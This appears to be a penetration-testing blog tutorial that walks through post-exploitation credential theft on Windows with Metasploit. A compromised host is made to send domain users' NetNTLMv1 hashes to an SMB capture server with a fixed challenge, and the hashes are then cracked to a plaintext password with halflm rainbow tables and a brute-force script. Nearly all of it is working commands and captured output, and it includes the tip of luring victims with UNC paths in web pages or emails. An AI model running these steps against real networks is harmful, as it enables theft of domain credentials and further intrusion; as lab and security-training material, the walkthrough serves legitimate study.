METASPLOIT AND OWNING WINDOWS: LANMAN RAINBOW CRACKING 

Previously I have gone through using metasploit to own your windows targets. In that article we looked at the password hashes stored locally on the target and using a rainbow cracking mechanism on those hashes. Great. But that does not help you if you are targeting domain credentials. Those hashes are not stored locally on workstations. But all is not lost. We can still try something, lets start by assuming you already have exploited your target..

Step 1 - Get the LM hash/NT hash from your target
Fire up the token stealing functionality (incognito) in your meterpreter session:

meterpreter > use incognito Loading extension incognito...success. meterpreter > list_tokens -u Delegation Tokens Available ======================================== BASE\bobby BASE\user NT AUTHORITY\LOCAL SERVICE NT AUTHORITY\NETWORK SERVICE NT AUTHORITY\SYSTEM Impersonation Tokens Available ======================================== NT AUTHORITY\ANONYMOUS LOGON meterpreter >

We can see we have access to a few user tokens, so lets get setup to capture these with a hash capturing server:

meterpreter > background msf  exploit(ms08_067_netapi) > back msf > use auxiliary/server/capture/smb msf  auxiliary(smb) > info        Name: Authentication Capture: SMB      Module: auxiliary/server/capture/smb     Version: 13983     License: Metasploit Framework License (BSD)        Rank: Normal Provided by:   hdm <hdm@metasploit.com> Basic options:   Name        Current Setting   Required  Description   ----        ---------------   --------  -----------   CAINPWFILE                    no        The local filename to store the hashes in Cain&Abel format   CHALLENGE   1122334455667788  yes       The 8 byte challenge   JOHNPWFILE                    no        The prefix to the local filename to store the hashes in JOHN format   SRVHOST     0.0.0.0           yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0   SRVPORT     445               yes       The local port to listen on.   SSL         false             no        Negotiate SSL for incoming connections   SSLCert                       no        Path to a custom SSL certificate (default is randomly generated)   SSLVersion  SSL3              no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1) Description:   This module provides a SMB service that can be used to capture the   challenge-response password hashes of SMB client systems. Responses   sent by this service have by default the configurable challenge   string (\x11\x22\x33\x44\x55\x66\x77\x88), allowing for easy   cracking using Cain & Abel, L0phtcrack or John the ripper (with   jumbo patch). To exploit this, the target system must try to   authenticate to this module. The easiest way to force a SMB   authentication attempt is by embedding a UNC path (\\SERVER\SHARE)   into a web page or email message. When the victim views the web page   or email, their system will automatically connect to the server   specified in the UNC share (the IP address of the system running   this module) and attempt to authenticate. msf  auxiliary(smb) > set JOHNPWFILE /admin/john.cap JOHNPWFILE => /admin/john.cap msf  auxiliary(smb) > set SRVHOST 192.168.2.114 SRVHOST => 192.168.2.114 msf  auxiliary(smb) > run [*] Auxiliary module execution completed [*] Server started. msf  auxiliary(smb) > netstat -ntlp [*] exec: netstat -ntlp Active Internet connections (only servers) Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name   tcp        0      0 192.168.2.114:445       0.0.0.0:*               LISTEN      1622/ruby

Now lets pause here quickly. You see there is a very cool little trick here. One of the ways MS have tried to make the passing of the hashes secure is through the concept of a salt. You see each session should use a different salt, because each time a server sees a new connection it should offer a new salt. Thus why using rainbow cracking on these hashes should not be feasible. BUT... what metasploit does is that the SMB server it runs to capture the hashes is setup to only ever use one 'salt' value, which pretty much negates the idea of a salt. This is what makes everything following this possible.

Ok so we have the capture server running lets get the hashes from our session:

msf  auxiliary(smb) > sessions -i 2 [*] Starting interaction with 2... meterpreter > snarf_hashes 192.168.2.114 [*] Snarfing token hashes... [*] NLMv1 Hash correspond to an empty password, ignoring ... [*] Sat Oct 29 20:49:23 -0400 2011 NTLMv1 Response Captured from 192.168.2.117:1145 USER:bobby DOMAIN:BASE OS:Windows 2002 2600 LM:Windows 2002 5.1 LMHASH:daf07fe6c760f6e45d069e8eb8df08dcecf946cd083f94aa NTHASH:1c2005506d26d77ea5333b24b316888dc15ae4431b9ae08c [*] Done. Check sniffer logs meterpreter > background [*] exec: cat /admin/john.cap_netntlm bobby::BASE:daf07fe6c760f6e45d069e8eb8df08dcecf946cd083f94aa:1c2005506d26d77ea5333b24b316888dc15ae4431b9ae08c:1122334455667788

Right now, you could run this capture through JTR, and this is not a bad option, but lets try something easier first.

Step 2 - Getting the kinda Rainbow cracker
You see, as mentioned above, having a static session key allows us to kinda rainbow crack the hash. You see we perform a halflm rainbow crack. We are able to rainbow crack the first part of the hash, and them from there we can do a brute-force on the rest. For this you will need metasploit and rcrack (the program itself is here and the tables are here). Do the normal 'make' to get it installed. When you are down, you should have the 'rcracki_mt' executable and a folder with halflm hashes. So lets try it by using the first 16 characters of the hash:

# ./rcracki_mt -h daf07fe6c760f6e4 ../halflm/* Using 1 threads for pre-calculation and false alarm checking... Found 1 rainbowtable files... halflmchall_alpha-numeric#1-7_3_2400x58924114_1122334455667788_distrrtgen[p][i]_0.rti: reading index... 13528977 bytes read, disk access time: 0.01 s reading table... 471392912 bytes read, disk access time: 0.41 s searching for 1 hash... plaintext of daf07fe6c760f6e4 is NEVER1Q                  cryptanalysis time: 0.06 s                        statistics ------------------------------------------------------- plaintext found:            1 of 1 (100.00%) total disk access time:     0.42 s total cryptanalysis time:   0.06 s total pre-calculation time: 4.92 s total chain walk step:      2876401 total false alarm:          15 total chain walk step due to false alarm: 34093 result ------------------------------------------------------- daf07fe6c760f6e4    NEVER1Q    hex:4e455645523151

Ok, so we got part of the password fairly quickly (about 6 seconds), lets look for the rest. For this we use a ruby script that is part of metasploit called 'halflm_second.rb', and what this does is simply brute-force the rest of the hash:

/admin/metasploit-4.1.0/msf3/tools# ./halflm_second.rb -n daf07fe6c760f6e45d069e8eb8df08dcecf946cd083f94aa -p NEVER1Q [*] Trying one character... [*] Cracked: NEVER1Q2

So there you go, an 8 character password cracked quite quickly. Now bear in mind, some of these will still pose a challenge:
- the characterset is out of the ordinary
- the length is fairly long (above 14 characters)
But even so the data you find from rainbow cracking the first part of the hash can often be very useful in building a custom dictionary for use with JTR.

Final Thoughts
What we have seen here is how an attacker using common tools can truly damage what you think is secure. We also see that rainbow cracking hashes is -once again- a truly scary tactic with devestating results. As always, play around, have fun and learn.